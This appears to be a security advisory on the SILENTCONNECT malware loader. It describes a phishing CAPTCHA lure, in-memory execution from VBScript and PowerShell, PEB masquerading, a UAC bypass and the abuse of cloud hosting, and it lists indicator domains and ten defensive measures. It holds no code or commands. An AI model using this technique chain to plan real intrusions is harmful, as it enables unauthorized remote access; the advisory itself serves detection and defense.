SILENTCONNECT is a sophisticated malware loader identified in ongoing threat campaigns since March 2025. It primarily functions to silently deploy ScreenConnect, a legitimate remote monitoring and management (RMM) software, onto compromised endpoints. The infection vector begins with a social engineering tactic where victims are redirected to a Cloudflare Turnstile CAPTCHA page masquerading as a digital invitation. When users interact with this page, a VBScript file is downloaded and executed. This VBScript leverages PowerShell to dynamically retrieve and execute C# source code entirely in memory, avoiding writing malicious binaries to disk and thus evading traditional antivirus detection. SILENTCONNECT incorporates advanced evasion techniques such as Process Environment Block (PEB) masquerading, which manipulates process information to hide its presence, and User Account Control (UAC) bypass to gain elevated privileges without user consent. The campaign abuses trusted cloud hosting services like Google Drive and Cloudflare to host payloads, increasing the likelihood of bypassing network security filters. It also exploits living-off-the-land binaries (LOLBins) to execute malicious code, reducing its footprint and detection risk. Once ScreenConnect is installed, attackers gain persistent remote access to the victim system, enabling extensive control for espionage, data exfiltration, lateral movement, or deployment of additional malware. The campaign's use of phishing with credible-looking invitations and CAPTCHA challenges increases user interaction and infection success. Indicators of compromise include specific file hashes, IP addresses, and domains such as bumptobabeco.top and imansport.ir. The stealthy nature and effective privilege escalation techniques make SILENTCONNECT a significant threat to organizations relying on Windows environments.

The deployment of SILENTCONNECT poses a substantial risk to organizations globally by enabling attackers to gain persistent, stealthy remote access via ScreenConnect. This access can lead to unauthorized data exfiltration, intellectual property theft, espionage, and disruption of business operations. The use of legitimate RMM software complicates detection and attribution, as malicious activity may blend with normal administrative tasks. The UAC bypass and in-memory execution techniques increase the likelihood of successful compromise even in environments with endpoint protection solutions. Organizations with remote workforce setups or those using ScreenConnect legitimately may face increased risk of credential theft or lateral movement within their networks. The abuse of trusted cloud services for payload hosting can bypass perimeter defenses, increasing infection rates. Overall, the threat can degrade confidentiality, integrity, and availability of critical systems, potentially causing financial loss, reputational damage, and regulatory consequences.

1. Implement strict email and web filtering to block phishing attempts, especially those mimicking invitations or using CAPTCHA pages. 2. Monitor and restrict execution of VBScript and PowerShell scripts, particularly those that download and execute code in memory. Use PowerShell logging and enable script block logging to detect suspicious activity. 3. Employ application control or whitelisting to prevent unauthorized execution of living-off-the-land binaries and unknown scripts. 4. Enforce the principle of least privilege and configure UAC policies to limit privilege escalation opportunities. 5. Monitor network traffic for unusual connections to known malicious domains and IP addresses associated with SILENTCONNECT campaigns. 6. Regularly audit and monitor the use of legitimate RMM tools like ScreenConnect to detect unauthorized installations or anomalous usage patterns. 7. Use endpoint detection and response (EDR) solutions capable of detecting in-memory code execution and PEB masquerading techniques. 8. Educate users to recognize phishing lures and suspicious invitations, emphasizing caution before interacting with unexpected CAPTCHA challenges or download prompts. 9. Maintain up-to-date threat intelligence feeds and indicators of compromise (IOCs) to enhance detection capabilities. 10. Segment networks to limit lateral movement if a system is compromised.